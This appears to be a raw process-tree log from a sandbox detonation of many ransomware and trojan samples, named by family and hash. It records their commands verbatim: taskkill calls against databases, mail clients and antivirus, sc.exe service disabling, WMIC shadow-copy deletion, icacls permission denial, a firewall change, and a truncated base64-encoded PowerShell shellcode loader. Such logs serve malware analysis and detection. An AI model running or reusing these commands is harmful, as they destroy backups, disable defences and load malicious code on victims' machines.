PID:2044
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
PID:5580
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
PID:1184
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe4⤵PID:5152
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
PID:5204
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe4⤵PID:5964
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:5468
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe4⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *324⤵PID:6488
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
PID:7732
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe4⤵PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe4⤵PID:6196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
PID:4448
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:6344
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F4⤵
- Kills process with taskkill
PID:6328
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
PID:6752
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
PID:6956
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe4⤵PID:7776
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
PID:4308
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE4⤵PID:8008
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe4⤵PID:7068
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:7100
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
PID:6980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe4⤵PID:7160
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
PID:6396
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
PID:7552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
PID:9576
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
PID:8860
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe4⤵PID:6508
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *324⤵PID:9732
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
PID:8024
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
PID:8652
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
PID:10016
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe4⤵PID:8596
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
PID:7944
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F4⤵
- Kills process with taskkill
PID:9664
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:9936
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe4⤵PID:2316
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
PID:6632
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe4⤵PID:9780
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
PID:9268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
PID:5008
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
PID:8472
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE4⤵PID:5196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
PID:9360
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe4⤵PID:8376
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
PID:6672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
PID:6288
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
PID:9332
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe4⤵PID:7568
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:4928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:8120
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
PID:8212
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe4⤵PID:8136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
PID:6944
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *324⤵PID:5240
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
PID:7052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
PID:7112
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe4⤵PID:9956
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
PID:8416
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe4⤵PID:5560
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
PID:8784
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
PID:8572
-
-
C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe"C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe4⤵PID:6044
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
PID:8884
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exeHEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4812 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:3840
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5464
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 18084⤵
- Program crash
PID:3596
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1808
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:660
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5476
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4620 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:4512
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5560
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3296
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exeHEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:832
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DARK_BLITZ.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DARK_BLITZ.exe"4⤵
- Executes dropped EXE
PID:1828
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3084
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exeHEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5264 -
C:\Windows\MsMpEng.exe"C:\Windows\MsMpEng.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5308 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes5⤵
- Modifies Windows Firewall
PID:3472
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exeHEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5608 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe"4⤵PID:6008
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5492
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-14f9538dd611ca701bdbc6b34a0562e8b18c2492ff323b32557b36673434541a.exeHEUR-Trojan-Ransom.Win32.Generic-14f9538dd611ca701bdbc6b34a0562e8b18c2492ff323b32557b36673434541a.exe3⤵
- Executes dropped EXE
PID:5672
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exeHEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:6136
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵PID:5860
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-dbfee080eb99d2c1fcba7e7d72191cef3b9f00ebd279a62147ccfb1ae17bdd84.exeHEUR-Trojan-Ransom.Win32.Generic-dbfee080eb99d2c1fcba7e7d72191cef3b9f00ebd279a62147ccfb1ae17bdd84.exe3⤵PID:5696
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:6128
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵PID:280
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-eb2c139afa264021f31c5bdb7ec16e0f661d6922f7d9d54770a571f8df51e7c2.exeHEUR-Trojan-Ransom.Win32.Generic-eb2c139afa264021f31c5bdb7ec16e0f661d6922f7d9d54770a571f8df51e7c2.exe3⤵PID:5720
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Mbro.gen-6c76ed03971ac0f2e98f6bbadb1495a0032037592ded5b3630b1baaf0ea40b71.exeHEUR-Trojan-Ransom.Win32.Mbro.gen-6c76ed03971ac0f2e98f6bbadb1495a0032037592ded5b3630b1baaf0ea40b71.exe3⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\MTK广告\MTK写串号工具.exeC:\Users\Admin\AppData\Local\Temp\MTK广告\MTK写串号工具.exe4⤵PID:5316
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Sodin.vho-9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1.exeHEUR-Trojan-Ransom.Win32.Sodin.vho-9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1.exe3⤵PID:5524
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exeHEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe3⤵PID:300
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exeHEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe4⤵PID:6680
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\9821a98a-8879-4324-91f2-9c0f106d8af3" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
PID:6776
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:8728
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe" --Admin IsNotAutoStart IsNotTask6⤵PID:1564
-
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-1168ac10887da9c3296428b2bc29b4b476fea0cd01e47c24edf56c685c42351b.exeHEUR-Trojan.MSIL.Crypt.gen-1168ac10887da9c3296428b2bc29b4b476fea0cd01e47c24edf56c685c42351b.exe3⤵PID:5332
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-118bd4bc740ceb90ee746885aa223d084df5ea457db13a826ed426fc9bf3add8.exeHEUR-Trojan.MSIL.Crypt.gen-118bd4bc740ceb90ee746885aa223d084df5ea457db13a826ed426fc9bf3add8.exe3⤵PID:5508
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exeHEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe3⤵PID:4840
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe"4⤵PID:8292
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-5f6d7a3aca682bbd784869d31355655a2a40f9aaad08012f1bfbbec26c7fac15.exeHEUR-Trojan.MSIL.Crypt.gen-5f6d7a3aca682bbd784869d31355655a2a40f9aaad08012f1bfbbec26c7fac15.exe3⤵PID:6040
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell /w 1 /C "sv xA -;sv Tnz ec;sv dg ((gv xA).value.toString()+(gv Tnz).value.toString());powershell (gv dg).value.toString() ('JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYA